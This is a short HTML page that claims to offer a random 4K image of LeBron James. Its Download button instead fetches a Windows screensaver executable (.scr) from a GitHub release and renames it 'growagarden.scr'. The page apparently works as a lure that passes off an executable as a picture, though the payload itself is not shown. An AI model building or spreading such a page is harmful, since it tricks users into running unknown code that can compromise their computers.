<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>4K LeBron Image</title>
    <meta name="description" content="This website gives you a random image of LeBron James in 4k">
</head>
<body>
  <h1>random 4k picture of Lebron</h1>
  <button id="downloadBtn">Download</button>

  <script>
    document.getElementById('downloadBtn').addEventListener('click', function() {
      const link = document.createElement('a');
      link.href = 'https://github.com/Nestrix-Applications/Lebron/releases/download/1/screenshot.scr';
      link.download = 'growagarden.scr'; // This may be ignored by the browser on external links
      document.body.appendChild(link);
      link.click();
      document.body.removeChild(link);
    });
  </script>
</body>
</html>
